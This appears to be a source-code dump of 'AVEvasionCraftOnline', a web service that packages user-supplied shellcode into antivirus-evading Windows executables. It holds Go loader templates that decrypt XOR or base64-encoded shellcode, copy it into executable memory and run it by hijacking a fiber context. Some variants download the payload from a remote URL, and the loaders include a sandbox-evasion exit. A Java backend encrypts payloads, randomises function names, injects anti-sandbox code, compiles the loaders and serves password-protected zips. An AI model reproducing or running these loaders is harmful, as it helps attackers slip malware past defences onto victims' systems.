| keyByte := key[i%keyLength] 60 | encryptedByte := byte ^ keyByte 61 | ciphertext[i] = encryptedByte 62 | } 63 | return ciphertext 64 | } 65 | 66 | func DecryptData(shellcode []byte) []byte { 67 | key := []byte{{{Key}}} 68 | decryptShellcode := XorDecrypt(shellcode, key) 69 | return decryptShellcode 70 | } 71 | 72 | func main() { 73 | args := os.Args[0] 74 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 75 | os.Exit(0) 76 | } 77 | 78 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 79 | if err != nil { 80 | return 81 | } 82 | byteData := DecryptData(ciphertext) 83 | Callback(byteData) 84 | } 85 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/LOCAL/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "encoding/base64" 5 | "fmt" 6 | "os" 7 | "syscall" 8 | "unsafe" 9 | ) 10 | 11 | var ( 12 | g_InitOnce [0]byte 13 | lpContext [0]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | CreateFiber = kernel32.NewProc("CreateFiber") 28 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 29 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func dummy() { 34 | var age string 35 | fmt.Scanln(&age) 36 | } 37 | 38 | func Callback(shellcode []byte) { 39 | var d func() 40 | d = dummy 41 | ConvertThreadToFiber.Call(NULL) 42 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 43 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 44 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 45 | if lpFiber == NULL { 46 | fmt.Printf("GLE : %d\n", err1) 47 | os.Exit(0) 48 | } 49 | 50 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 51 | *tgtFuncAddr = addr 52 | fmt.Println(tgtFuncAddr) 53 | SwitchToFiber.Call(lpFiber) 54 | } 55 | 56 | func XorDecrypt(plaintext []byte, key []byte) []byte { 57 | ciphertext := make([]byte, len(plaintext)) 58 | keyLength := len(key) 59 | for i, byte := range plaintext { 60 | keyByte := key[i%keyLength] 61 | encryptedByte := byte ^ keyByte 62 | ciphertext[i] = encryptedByte 63 | } 64 | return ciphertext 65 | } 66 | 67 | func DecryptData(v2 string) []byte { 68 | key := []byte{{{Key}}} 69 | v22, _ := base64.StdEncoding.DecodeString(v2) 70 | v222 := XorDecrypt(v22, key) 71 | return v222 72 | } 73 | 74 | func main() { 75 | args := os.Args[0] 76 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 77 | os.Exit(0) 78 | } 79 | 80 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 81 | if err != nil { 82 | return 83 | } 84 | byteData := DecryptData(string(ciphertext)) 85 | Callback(byteData) 86 | } 87 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/REMOTE/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | g_InitOnce [0]byte 14 | lpContext [0]byte 15 | ) 16 | 17 | const ( 18 | MEM_COMMIT = 0x1000 19 | MEM_RESERVE = 0x2000 20 | PAGE_EXECUTE_READWRITE = 0x40 21 | NULL = 0 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 26 | ntdll = syscall.NewLazyDLL("ntdll.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | CreateFiber = kernel32.NewProc("CreateFiber") 29 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 30 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 31 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 32 | ) 33 | 34 | func dummy() { 35 | var age string 36 | fmt.Scanln(&age) 37 | } 38 | 39 | func Callback(shellcode []byte) { 40 | var d func() 41 | d = dummy 42 | ConvertThreadToFiber.Call(NULL) 43 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 44 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 45 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 46 | if lpFiber == NULL { 47 | fmt.Printf("GLE : %d\n", err1) 48 | os.Exit(0) 49 | } 50 | 51 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 52 | *tgtFuncAddr = addr 53 | fmt.Println(tgtFuncAddr) 54 | SwitchToFiber.Call(lpFiber) 55 | } 56 | 57 | func XorDecrypt(plaintext []byte, key []byte) []byte { 58 | ciphertext := make([]byte, len(plaintext)) 59 | keyLength := len(key) 60 | for i, byte := range plaintext { 61 | keyByte := key[i%keyLength] 62 | encryptedByte := byte ^ keyByte 63 | ciphertext[i] = encryptedByte 64 | } 65 | return ciphertext 66 | } 67 | 68 | func DecryptData(shellcode []byte) []byte { 69 | key := []byte{{{Key}}} 70 | decryptShellcode := XorDecrypt(shellcode, key) 71 | return decryptShellcode 72 | } 73 | 74 | func fetchShellcode(url string) []byte { 75 | _, body, _ := fasthttp.Get(nil, url) 76 | return body 77 | } 78 | 79 | func main() { 80 | args := os.Args[0] 81 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 82 | os.Exit(0) 83 | } 84 | 85 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 86 | byteData := DecryptData(ciphertext) 87 | Callback(byteData) 88 | } 89 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/REMOTE/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "encoding/base64" 5 | "fmt" 6 | "os" 7 | "syscall" 8 | "unsafe" 9 | 10 | "github.com/valyala/fasthttp" 11 | ) 12 | 13 | var ( 14 | g_InitOnce [0]byte 15 | lpContext [0]byte 16 | ) 17 | 18 | const ( 19 | MEM_COMMIT = 0x1000 20 | MEM_RESERVE = 0x2000 21 | PAGE_EXECUTE_READWRITE = 0x40 22 | NULL = 0 23 | ) 24 | 25 | var ( 26 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 27 | ntdll = syscall.NewLazyDLL("ntdll.dll") 28 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 29 | CreateFiber = kernel32.NewProc("CreateFiber") 30 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 31 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 32 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 33 | ) 34 | 35 | func dummy() { 36 | var age string 37 | fmt.Scanln(&age) 38 | } 39 | 40 | func Callback(shellcode []byte) { 41 | var d func() 42 | d = dummy 43 | ConvertThreadToFiber.Call(NULL) 44 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 45 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 46 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 47 | if lpFiber == NULL { 48 | fmt.Printf("GLE : %d\n", err1) 49 | os.Exit(0) 50 | } 51 | 52 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 53 | *tgtFuncAddr = addr 54 | fmt.Println(tgtFuncAddr) 55 | SwitchToFiber.Call(lpFiber) 56 | } 57 | 58 | func XorDecrypt(plaintext []byte, key []byte) []byte { 59 | ciphertext := make([]byte, len(plaintext)) 60 | keyLength := len(key) 61 | for i, byte := range plaintext { 62 | keyByte := key[i%keyLength] 63 | encryptedByte := byte ^ keyByte 64 | ciphertext[i] = encryptedByte 65 | } 66 | return ciphertext 67 | } 68 | 69 | func DecryptData(v2 string) []byte { 70 | key := []byte{{{Key}}} 71 | v22, _ := base64.StdEncoding.DecodeString(v2) 72 | v222 := XorDecrypt(v22, key) 73 | return v222 74 | } 75 | 76 | func fetchShellcode(url string) []byte { 77 | _, body, _ := fasthttp.Get(nil, url) 78 | return body 79 | } 80 | 81 | func main() { 82 | args := os.Args[0] 83 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 84 | os.Exit(0) 85 | } 86 | 87 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 88 | byteData := DecryptData(string(ciphertext)) 89 | Callback(byteData) 90 | } 91 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/App.vue: -------------------------------------------------------------------------------- 1 | 13 | 48 | 49 | 50 | 53 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/utils/ShellcodeProcessor.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import java.io.File; 4 | import java.io.IOException; 5 | import java.nio.file.Path; 6 | import java.util.Base64; 7 | 8 | 9 | 10 | public class ShellcodeProcessor { 11 | 12 | private static final int TEMPLATE_XOR_LEN = 10; 13 | private static byte[] key; 14 | 15 | public static String transformation(byte[] shellcode, String transformationMethod, Path outputFilename) throws IOException { 16 | key = generateRandomKey(); 17 | String result = switch (transformationMethod) { 18 | case "base64Xor" -> base64XorEncrypt(shellcode); 19 | case "xor" -> xorEncryptAndConvertToHexString(shellcode); 20 | case "none" -> TextFileProcessor.convertToHexStringWithPrefix(shellcode); 21 | default -> throw new IllegalStateException("Unexpected value: " + transformationMethod); 22 | }; 23 | 24 | assert result != null; 25 | Path of = Path.of(outputFilename + ".bin"); 26 | if (transformationMethod.equals("base64Xor")) { 27 | FileUtils.saveFileBytes(of, result.getBytes()); 28 | } else { 29 | FileUtils.saveFileBytes(of, TextFileProcessor.convertHexStringToByteArray(result)); 30 | } 31 | return result; 32 | } 33 | public static String getKey() { 34 | return TextFileProcessor.convertToHexStringWithPrefix(key); 35 | } 36 | private static String base64XorEncrypt(byte[] shellcode) { 37 | byte[] encryptedBytes = xorEncrypt(shellcode); 38 | return Base64.getEncoder().encodeToString(encryptedBytes); 39 | } 40 | 41 | private static String xorEncryptAndConvertToHexString(byte[] shellcode) { 42 | byte[] encryptedBytes = xorEncrypt(shellcode); 43 | return TextFileProcessor.convertToHexStringWithPrefix(encryptedBytes); 44 | } 45 | 46 | private static byte[] xorEncrypt(byte[] plaintext) { 47 | byte[] ciphertext = new byte[plaintext.length]; 48 | int keyLength = key.length; 49 | 50 | for (int i = 0; i < plaintext.length; i++) { 51 | byte keyByte = key[i % keyLength]; 52 | byte encryptedByte = (byte) (plaintext[i] ^ keyByte); 53 | ciphertext[i] = encryptedByte; 54 | } 55 | 56 | return ciphertext; 57 | } 58 | 59 | private static byte[] generateRandomKey() { 60 | return TextFileProcessor.generateRandomString(TEMPLATE_XOR_LEN).getBytes(); 61 | } 62 | 63 | private static String generateRandomFilename() { 64 | return TextFileProcessor.generateRandomString(TEMPLATE_XOR_LEN); 65 | } 66 | // 67 | // public static String noneProcess(String shellcode, String templateCode) { 68 | // 69 | // return templateCode.replace(TEMPLATE_LEN_PLACEHOLDER, String.valueOf(countCommas(shellcode) + 1)) 70 | // .replace(TEMPLATE_SHELLCODE_PLACEHOLDER, shellcode); 71 | // } 72 | 73 | } 74 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 3.2.2 9 | 10 | 11 | com.yutian4060 12 | AVEvasionCraftOnline 13 | 0.0.1-SNAPSHOT 14 | AVEvasionCraftOnline 15 | AVEvasionCraftOnline 16 | 17 | 17 18 | 19 | 20 | 21 | org.springframework.boot 22 | spring-boot-starter-web 23 | 24 | 25 | 26 | org.projectlombok 27 | lombok 28 | true 29 | 30 | 31 | org.springframework.boot 32 | spring-boot-starter-test 33 | test 34 | 35 | 36 | 37 | net.lingala.zip4j 38 | zip4j 39 | 2.11.3 40 | 41 | 42 | 43 | 44 | AVEvasionCraftOnline 45 | 46 | 47 | src/main/resources/static 48 | META-INF/resources/ 49 | 50 | 51 | src/main/resources/static 52 | 53 | sql/** 54 | *.yml 55 | logback.xml 56 | 57 | false 58 | 59 | 60 | 61 | 62 | org.springframework.boot 63 | spring-boot-maven-plugin 64 | 65 | 66 | 67 | org.projectlombok 68 | lombok 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/utils/TextFileProcessor.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import java.io.IOException; 4 | import java.nio.file.Files; 5 | import java.nio.file.Path; 6 | import java.util.Arrays; 7 | import java.util.List; 8 | import java.util.Objects; 9 | import java.util.Random; 10 | 11 | public class TextFileProcessor { 12 | 13 | private static final String CHARACTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 14 | private static final int FUNCTION_NAME_LENGTH = 10; 15 | 16 | public static String replaceFunctionNames(String code, List variableNames) { 17 | for (String variableName : variableNames) { 18 | String generatedVariableName = generateRandomString(FUNCTION_NAME_LENGTH); 19 | code = code.replace(variableName, generatedVariableName); 20 | } 21 | return code; 22 | } 23 | 24 | public static String antiSandbox(String code, List antiLists) throws IOException { 25 | for(Integer antiList : antiLists) { 26 | code = code.replace(antiList.toString(), Files.readString(Path.of("C:\\1bypassAVOnline\\antisandbox\\" + antiList))); 27 | } 28 | System.out.println(code); 29 | Files.write(Path.of("C:\\1bypassAVOnline\\antisandbox\\out1.go"), code.getBytes()); 30 | return code; 31 | } 32 | 33 | public static String generateRandomString(int length) { 34 | Random random = new Random(); 35 | StringBuilder randomString = new StringBuilder(length); 36 | for (int i = 0; i < length; i++) { 37 | char randomChar = (char) (random.nextInt(26) + 'A'); // 生成随机大写字母 38 | randomString.append(randomChar); 39 | } 40 | return randomString.toString(); 41 | } 42 | 43 | public static String convertToHexStringWithoutPrefix(byte[] bytes) { 44 | StringBuilder sb = new StringBuilder(); 45 | for (byte b : bytes) { 46 | sb.append(String.format("%02x", b)); 47 | } 48 | return sb.toString(); 49 | } 50 | 51 | 52 | public static String convertToHexStringWithPrefix(byte[] bytes) { 53 | StringBuilder hexString = new StringBuilder(); 54 | for (byte b : bytes) { 55 | hexString.append(String.format("0x%02X, ", b)); 56 | } 57 | 58 | // 移除最后一个逗号和空格 59 | hexString.deleteCharAt(hexString.length() - 2); 60 | return hexString.toString(); 61 | } 62 | 63 | public static byte[] convertHexStringToByteArray(String hexString) { 64 | String[] hexValues = hexString.split(",\\s+"); // 按逗号和空格分割字符串 65 | byte[] byteArray = new byte[hexValues.length]; 66 | for (int i = 0; i < hexValues.length; i++) { 67 | String hexValue = hexValues[i].trim().substring(2); // 去除前导的 "0x" 或 "0X" 68 | int decimalValue = Integer.parseInt(hexValue, 16); // 将十六进制值转换为整数 69 | byteArray[i] = (byte) decimalValue; 70 | } 71 | return byteArray; 72 | } 73 | 74 | public static int countCommas(String text) { 75 | int count = 0; 76 | 77 | for (int i = 0; i < text.length(); i++) { 78 | if (text.charAt(i) == ',') { 79 | count++; 80 | } 81 | } 82 | 83 | return count; 84 | } 85 | 86 | 87 | } 88 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/components/ProcessValueLookup.vue: -------------------------------------------------------------------------------- 1 | 18 | 19 | 81 | 82 | 100 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/utils/CompilerCode.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import com.yutian4060.avevasioncraftonline.config.BypassAVConfigProperties; 4 | import com.yutian4060.avevasioncraftonline.service.impl.CompileServiceImpl; 5 | import jakarta.annotation.PostConstruct; 6 | import org.slf4j.Logger; 7 | import org.slf4j.LoggerFactory; 8 | import org.springframework.beans.factory.annotation.Autowired; 9 | import org.springframework.stereotype.Component; 10 | 11 | import java.io.BufferedReader; 12 | import java.io.File; 13 | import java.io.IOException; 14 | import java.io.InputStreamReader; 15 | import java.util.List; 16 | import java.util.UUID; 17 | 18 | @Component 19 | public class CompilerCode { 20 | 21 | public static BypassAVConfigProperties bypassAVConfigProperties; 22 | private static final Logger logger = LoggerFactory.getLogger(CompilerCode.class); 23 | private static String WORKING_DIRECTORY; 24 | @Autowired 25 | public void setApplicationProperties(BypassAVConfigProperties bypassAVConfigProperties) { 26 | CompilerCode.bypassAVConfigProperties = bypassAVConfigProperties; 27 | } 28 | 29 | @PostConstruct 30 | private void initializeConstants() { 31 | WORKING_DIRECTORY = bypassAVConfigProperties.getCompilerWorkDirectory(); 32 | } 33 | 34 | public static void compileNim(String destinationPath, String builderWorkPath) { 35 | List command = List.of("nim", "c", "-d=release", "-d=mingw", "--app=gui", "-d:strip", "--opt:size", 36 | "--cpu=amd64", "-o:" + destinationPath + ".exe", destinationPath); 37 | logger.info("Builder Command: {}", command); 38 | executeCommand(command, builderWorkPath); 39 | } 40 | 41 | public static void compileGo(String destinationPath, String builderWorkPath) { 42 | List command = List.of("go", "build", "-ldflags=-s -w -H=windowsgui", "-trimpath", "-o", destinationPath + ".exe", destinationPath); 43 | logger.info("Builder Command: {}", command); 44 | executeCommand(command, builderWorkPath); 45 | } 46 | 47 | public static void compileC(String destinationPath, String builderWorkPath) { 48 | List command = List.of("x86_64-w64-mingw32-gcc", "-o", destinationPath + ".exe", destinationPath); 49 | logger.info("Builder Command: {}", command); 50 | executeCommand(command, builderWorkPath); 51 | } 52 | 53 | private static void executeCommand(List command, String builderWorkPath) { 54 | try { 55 | 56 | ProcessBuilder processBuilder = new ProcessBuilder(command); 57 | processBuilder.directory(new File(WORKING_DIRECTORY + File.separator + builderWorkPath)); 58 | Process process = processBuilder.start(); 59 | 60 | int exitCode = process.waitFor(); 61 | 62 | if (exitCode == 0) { 63 | logger.info("Compilation successful"); 64 | } else { 65 | logger.error("Compilation failed with exit code: {}", exitCode); 66 | printErrorStream(process); 67 | } 68 | } catch (IOException | InterruptedException e) { 69 | logger.error("Error during compilation", e); 70 | } 71 | } 72 | 73 | private static void printErrorStream(Process process) throws IOException { 74 | try (BufferedReader reader = new BufferedReader(new InputStreamReader(process.getErrorStream()))) { 75 | String line; 76 | while ((line = reader.readLine()) != null) { 77 | logger.error(line); 78 | } 79 | } 80 | } 81 | 82 | public static String getRandomDirectorName() { 83 | return UUID.randomUUID().toString(); 84 | } 85 | 86 | } 87 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/controller/CompilerController.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.controller; 2 | 3 | import com.yutian4060.avevasioncraftonline.dto.CompilationResponseDTO; 4 | import com.yutian4060.avevasioncraftonline.dto.ShellcodeUploadDTO; 5 | import com.yutian4060.avevasioncraftonline.enums.Result; 6 | import com.yutian4060.avevasioncraftonline.service.CompileService; 7 | import com.yutian4060.avevasioncraftonline.utils.FileUtils; 8 | import jakarta.annotation.Resource; 9 | import org.slf4j.Logger; 10 | import org.slf4j.LoggerFactory; 11 | import org.springframework.beans.factory.annotation.Autowired; 12 | import org.springframework.beans.factory.annotation.Value; 13 | import org.springframework.http.*; 14 | import org.springframework.web.bind.annotation.*; 15 | 16 | import java.io.File; 17 | import java.io.IOException; 18 | 19 | @RestController 20 | public class CompilerController { 21 | 22 | @Resource 23 | CompileService compileService; 24 | 25 | @Value("${bypassav.storage-directory}") 26 | String downloadDirector; 27 | 28 | private static final Logger logger = LoggerFactory.getLogger(CompilerController.class); 29 | 30 | @PostMapping("/api/compiler") 31 | public Result shellcodeUpload(@ModelAttribute ShellcodeUploadDTO shellcodeUploadDTO) throws IOException { 32 | CompilationResponseDTO result = null; 33 | 34 | logger.info("Received shellcode upload:"); 35 | logger.info("Template Language: {}", shellcodeUploadDTO.getTemplateLanguage()); 36 | logger.info("Shellcode length: {}", shellcodeUploadDTO.getShellcode().getBytes().length); 37 | logger.info("Template Name: {}", shellcodeUploadDTO.getTemplateName()); 38 | logger.info("Transformation: {}", shellcodeUploadDTO.getTransformation()); 39 | logger.info("Storage Type: {}", shellcodeUploadDTO.getStorageType()); 40 | logger.info("Additional Parameter: {}", shellcodeUploadDTO.getAdditionalParameter()); 41 | 42 | ShellcodeUploadDTO.StorageType storageType = shellcodeUploadDTO.getStorageType(); 43 | 44 | if (shellcodeUploadDTO.getShellcode().getBytes().length > 5200000 || shellcodeUploadDTO.getShellcode().getBytes().length < 200) { 45 | logger.warn("File Size: {}", shellcodeUploadDTO.getShellcode().getBytes().length); 46 | return Result.error(); 47 | } 48 | 49 | if (storageType != ShellcodeUploadDTO.StorageType.REMOTE && 50 | storageType != ShellcodeUploadDTO.StorageType.EMBEDDED && 51 | storageType != ShellcodeUploadDTO.StorageType.LOCAL) { 52 | logger.warn("storageType: {}", storageType); 53 | return Result.error(); 54 | } 55 | 56 | String templateLanguage = shellcodeUploadDTO.getTemplateLanguage(); 57 | switch (templateLanguage) { 58 | case "c" -> result = compileService.compileCodeC(shellcodeUploadDTO); 59 | case "nim" -> result = compileService.compileCodeNim(shellcodeUploadDTO); 60 | case "go" -> result = compileService.compileCodeGo(shellcodeUploadDTO); 61 | default -> Result.error(); 62 | } 63 | 64 | if (result == null) { 65 | return Result.error(); 66 | } 67 | 68 | return Result.success(result); 69 | } 70 | 71 | @GetMapping("/api/download/{filename}") 72 | public ResponseEntity downloadFile(@PathVariable String filename) { 73 | byte[] fileBytes = FileUtils.readFileBytes(downloadDirector + File.separator + filename.substring(0, filename.lastIndexOf(".")) + File.separator + filename); 74 | 75 | String contentType = "application/octet-stream"; 76 | 77 | HttpHeaders headers = new HttpHeaders(); 78 | headers.setContentType(MediaType.parseMediaType(contentType)); 79 | headers.setContentDisposition(ContentDisposition.attachment().filename(filename).build()); 80 | 81 | return new ResponseEntity<>(fileBytes, headers, HttpStatus.OK); 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/utils/FileUtils.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import com.yutian4060.avevasioncraftonline.dto.ShellcodeUploadDTO; 4 | import net.lingala.zip4j.ZipFile; 5 | import net.lingala.zip4j.model.ZipParameters; 6 | import net.lingala.zip4j.model.enums.EncryptionMethod; 7 | import org.slf4j.Logger; 8 | import org.slf4j.LoggerFactory; 9 | import org.springframework.util.FileSystemUtils; 10 | 11 | import java.io.File; 12 | import java.io.IOException; 13 | import java.nio.charset.StandardCharsets; 14 | import java.nio.file.Files; 15 | import java.nio.file.Path; 16 | import java.nio.file.StandardCopyOption; 17 | import java.util.Arrays; 18 | import java.util.List; 19 | 20 | public class FileUtils { 21 | 22 | private static final Logger logger = LoggerFactory.getLogger(FileUtils.class); 23 | 24 | public static String writeREADME(ShellcodeUploadDTO shellcodeUploadDTO) { 25 | String shellcodeName = null; 26 | if (shellcodeUploadDTO.getAdditionalParameter().equals("")) { 27 | shellcodeName = "内嵌"; 28 | } 29 | String storageType = switch (shellcodeUploadDTO.getStorageType()) { 30 | case REMOTE -> "远程存储 Shellcode"; 31 | case LOCAL -> "本地存储 Shellcode"; 32 | default -> "内嵌存储 Shellcode"; 33 | }; 34 | 35 | return String.format(""" 36 | 本工具仅供安全研究和教学目的使用,用户须自行承担因使用该工具而引起的一切法律及相关责任。 37 | 作者概不对任何法律责任承担责任,且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。 38 | 39 | 本工具使用 MIT 许可证。 40 | 项目地址:https://github.com/yutianqaq/AVEvasionCraftOnline 41 | 42 | Shellcode 加载方式:%s 43 | Shellcode 转换方式:%s 44 | Shellcode 存储方式:%s 45 | Shellcode 资源名称:%s 46 | """, shellcodeUploadDTO.getTemplateName(), shellcodeUploadDTO.getTransformation(), 47 | storageType, shellcodeName); 48 | } 49 | public static void saveFileZIP(String zipFileName, String filePath, String outputShellcodeFilePath, String storageDirectory, String readme) throws IOException { 50 | Path storagePath = Path.of(storageDirectory); 51 | Files.createDirectories(storagePath); 52 | 53 | String zipPassword = "yutian"; 54 | 55 | try (ZipFile zipFile = new ZipFile(storagePath + File.separator + zipFileName + ".zip", zipPassword.toCharArray())) { 56 | ZipParameters zipParameters = new ZipParameters(); 57 | zipParameters.setEncryptFiles(true); 58 | zipParameters.setEncryptionMethod(EncryptionMethod.ZIP_STANDARD); 59 | 60 | // 添加文件到压缩包,包括文本内容 61 | List filesToAdd = Arrays.asList( 62 | new File(filePath), 63 | new File(outputShellcodeFilePath), 64 | createTextFileInMemory(readme) 65 | ); 66 | 67 | zipFile.addFiles(filesToAdd, zipParameters); 68 | } 69 | 70 | Files.delete(Path.of(filePath)); // 删除二进制文件 71 | Files.delete(Path.of(outputShellcodeFilePath)); // 删除其他文件 72 | 73 | } 74 | 75 | private static File createTextFileInMemory(String readme) throws IOException { 76 | Path tempTextFilePath = Files.createTempFile("README", ".txt"); 77 | Files.writeString(tempTextFilePath, readme, StandardCharsets.UTF_8); 78 | return tempTextFilePath.toFile(); 79 | } 80 | 81 | public static byte[] readFileBytes(String filePath) { 82 | try { 83 | return Files.readAllBytes(Path.of(filePath)); 84 | } catch (IOException e) { 85 | e.printStackTrace(); 86 | return null; 87 | } 88 | } 89 | 90 | public static boolean copyFile(String sourcePath, String destinationPath) { 91 | try { 92 | Files.copy(Path.of(sourcePath), Path.of(destinationPath), StandardCopyOption.REPLACE_EXISTING); 93 | return true; 94 | } catch (IOException e) { 95 | e.printStackTrace(); 96 | return false; 97 | } 98 | } 99 | 100 | public static void saveFileBytes(Path filePath, byte[] content) { 101 | try { 102 | Files.write(filePath, content); 103 | } catch (IOException e) { 104 | e.printStackTrace(); 105 | } 106 | } 107 | 108 | public static void deleteDirectory(Path directoryPath) throws IOException { 109 | try { 110 | FileSystemUtils.deleteRecursively(directoryPath); 111 | logger.info("Directory deletion successful: {}", directoryPath); 112 | } catch (IOException e) { 113 | logger.info("Directory deletion failed: {}", directoryPath); 114 | } 115 | } 116 | 117 | } 118 | --------------------------------------------------------------------------------